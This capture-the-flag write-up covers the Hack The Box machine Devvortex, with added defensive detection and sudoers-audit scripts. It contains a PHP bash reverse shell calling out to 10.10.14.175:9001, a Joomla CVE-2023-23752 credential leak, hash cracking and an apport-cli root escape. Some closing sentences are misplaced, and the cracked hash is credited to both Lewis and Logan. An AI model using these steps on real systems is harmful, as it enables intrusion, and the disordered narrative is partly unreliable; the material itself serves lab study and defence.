
HTB - Devvortex

p0db0t's writeup of the easy-difficulty Linux machine Devvortex from https://hackthebox.eu

Last updated 1 year ago

Enumeration Phase:

Nmap scan

First off, I started my enumeration with an Nmap scan of 10.10.11.242. The options I regularly use are -sC, which is equivalent to --script=default and runs the default set of Nmap enumeration scripts against the target, and -sV, which probes the open ports to identify the service and version behind each one.

nmap -sC -sV 10.10.11.242

I added devvortex.htb to /etc/hosts next to the IP of the box, which is 10.10.11.242.

Since I still didn't have a way in, the next place to enumerate was HTTP on port 80. Navigating to http://devvortex.htb

Brute-force hidden directories:

gobuster dir -u devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 200

Subdomain enumeration:

I also used gobuster, this time in vhost mode, to enumerate subdomains of this host, and found dev.devvortex.htb.

gobuster vhost -u devvortex.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

I added dev.devvortex.htb to /etc/hosts next to the IP of the box, which is 10.10.11.242.

After visiting http://dev.devvortex.htb

Brute-force hidden directories:

dirsearch -u dev.devvortex.htb

On the Administrator page, I found the login page of the Joomla CMS.

On the Readme.txt page, I found the version of the Joomla CMS: 4.2.

Initial Foothold:

curl -v 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true'

After logging in to the Administrator page with the credentials I found with curl, I edited error.php, located at /templates/cassiopeia/error.php, and replaced its contents with a reverse-shell script.

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.175/9001 0>&1'");
?>

I ran Netcat to listen for incoming connections and used curl to request the error.php page, which triggered the reverse shell.

nc -lvnp 9001
curl http://dev.devvortex.htb/templates/cassiopeia/error.php

Boom! I got a shell as www-data.
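From the defender's side, the steps above leave a recognisable trace in the web server's access log. The following script is an added example (not part of the original writeup): it parses combined-format log lines and flags the gobuster/dirsearch brute-force (many 404s from one client in a short window), the request to the Joomla config endpoint abused by CVE-2023-23752, and a direct request to templates/cassiopeia/error.php. The log lines, the 20-in-60-seconds threshold and the finding labels are constructed assumptions.

```python
"""Detection for the traffic this walkthrough generates (added example, not part of the writeup).
Parses combined-format web access log lines and flags the three things seen above: a directory
brute-force (one client, many 404s in a short window), a hit on the Joomla REST config endpoint
abused by CVE-2023-23752, and a direct request to a template's error.php, which normal site
traffic never makes. The log lines at the bottom are constructed for this example."""
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+')
LEAK_PATH = "/api/index.php/v1/config/application"            # endpoint from the curl step above
TEMPLATE_ERROR = re.compile(r"^/templates/[^/]+/error\.php$")  # file edited for the reverse shell

def analyze(lines, burst_404=20, window_s=60):
    """Return (ip, finding) tuples; each client gets at most one brute-force finding."""
    findings, not_found = [], defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:                      # skip lines that are not combined-format entries
            continue
        ip, path, status = m["ip"], m["path"].split("?", 1)[0].lower(), m["status"]
        if status == "404":
            not_found[ip].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
        if path == LEAK_PATH:
            findings.append((ip, "joomla-config-leak (CVE-2023-23752)"))
        elif TEMPLATE_ERROR.match(path):
            findings.append((ip, "direct template error.php request"))
    for ip, stamps in not_found.items():
        stamps.sort()
        # sliding window: any burst_404 consecutive 404s that fall inside window_s seconds
        for i in range(len(stamps) - burst_404 + 1):
            if (stamps[i + burst_404 - 1] - stamps[i]).total_seconds() <= window_s:
                findings.append((ip, f"directory brute-force: {burst_404}+ 404s within {window_s}s"))
                break
    return findings

# Constructed sample: 25 wordlist probes in 25 s, the config leak, the shell trigger, one normal hit
SAMPLE = [f'10.10.14.175 - - [26/Nov/2023:10:00:{i:02d} +0000] "GET /dir{i} HTTP/1.1" 404 196'
          for i in range(25)] + [
    '10.10.14.175 - - [26/Nov/2023:10:02:00 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1234',
    '10.10.14.175 - - [26/Nov/2023:10:05:00 +0000] "GET /templates/cassiopeia/error.php HTTP/1.1" 200 0',
    '192.0.2.10 - - [26/Nov/2023:10:05:01 +0000] "GET /index.php HTTP/1.1" 200 9812',
]

if __name__ == "__main__":
    for ip, what in analyze(SAMPLE):
        print(ip, what)
```

Running it over the constructed sample yields three findings, all for the scanning client; the normal visitor produces none.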

Owning User:

The credentials I found with curl also included a database name, so I went on to check MySQL.

mysql -u lewis -p
show databases;
use joomla
show tables;
select * from sd4fg_users;
echo 'HASH' >> hash.txt

I cracked Logan's hash using John the Ripper.

sudo john --wordlist=/usr/share/wordlists/rockyou.txt --rules hash.txt

Sweet!!!! I logged in as the user Logan via SSH.

ssh logan@devvortex.htb

Owning Root:

The sudo -l command gave me some interesting output.

sudo -l                               # shows that logan may run apport-cli as root
sudo apport-cli -c /bin/mysql less    # the report is displayed through the less pager
v                                     # view the report, which opens the pager
!                                     # shell escape from less; the shell runs as root
id
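The root step works because a sudo rule hands an interactive program, and with it a pager, to a non-root user. As an added example from the defender's side (not part of the original writeup), the script below audits sudoers user-spec lines for exactly that kind of grant; it covers apport-cli, the program this box exposes, and also less itself, which the page shows as the pager, as a small generalization. The sudoers fragment and the remediation strings are constructed.

```python
"""Audit sudoers rules for the grant abused in the Owning Root step (added example, not from the
writeup): a user allowed to run apport-cli as root, whose report view opens a pager (less) where the
! shell escape yields a root shell (CVE-2023-1326). The sudoers fragment at the bottom is constructed."""
import re

# Rule line: user host=(runas) [TAG:] cmd, cmd ...   (Defaults and comment lines are skipped)
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$")
REASONS = {  # programs named in the writeup that hand root privileges to an interactive pager
    "apport-cli": "apport-cli displays reports in a pager as root; patch apport (CVE-2023-1326) or drop the rule",
    "less": "less allows shell escapes as root; drop the rule",
}

def parse_rule(line):
    """Split one user-spec line into user, runas user and a list of (tags, command) pairs."""
    line = line.strip()
    m = RULE_RE.match(line)
    if line.startswith(("#", "Defaults")) or not m:
        return None
    runas = (m["runas"] or "root").split(":")[0]       # (user:group) -> user; default runas is root
    cmds = []
    for spec in m["cmds"].split(","):
        parts = spec.split()
        tags = set()
        while parts and parts[0].endswith(":"):        # NOPASSWD:, SETENV:, ...
            tags.add(parts.pop(0)[:-1])
        cmds.append((tags, " ".join(parts)))
    return {"user": m["user"], "runas": runas, "cmds": cmds}

def audit(lines):
    """Return (user, command, reason) for non-root users who can reach a root shell through a pager."""
    findings = []
    for line in lines:
        rule = parse_rule(line)
        if not rule or rule["user"] == "root" or rule["runas"] not in ("root", "ALL"):
            continue
        for tags, cmd in rule["cmds"]:
            prog = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
            if prog in REASONS:
                reason = REASONS[prog] + (" (NOPASSWD: no credential prompt either)" if "NOPASSWD" in tags else "")
                findings.append((rule["user"], cmd, reason))
    return findings

# Constructed fragment: a Devvortex-style grant, a harmless rule, and a commented-out copy
SAMPLE_SUDOERS = [
    "Defaults env_reset",
    "root ALL=(ALL:ALL) ALL",
    "logan ALL=(ALL) /usr/bin/apport-cli",
    "backup ALL=(root) NOPASSWD: /usr/bin/rsync",
    "# ops ALL=(ALL) /usr/bin/apport-cli",
]
```

On a real host, feed it the output of `sudo -l` style rule lines or the user-spec lines from /etc/sudoers and /etc/sudoers.d; only the logan rule is reported for the constructed fragment.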

After visiting http://devvortex.htb, I decided to brute-force hidden directories with Gobuster and didn't find anything.

I then brute-forced hidden directories with Dirsearch and found /administrator/ and /Readme.txt.

I found out that Joomla CMS 4.2 is vulnerable to CVE-2023-23752 and used curl to retrieve some sensitive information, including the username and password of the user Lewis. More on CVE-2023-23752 at this link: https://nvd.nist.gov/vuln/detail/CVE-2023-23752

Bingo! I found the hash of Lewis and saved it locally in a .txt file.

I found out that apport-cli is vulnerable to CVE-2023-1326. More on CVE-2023-1326 at this link: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023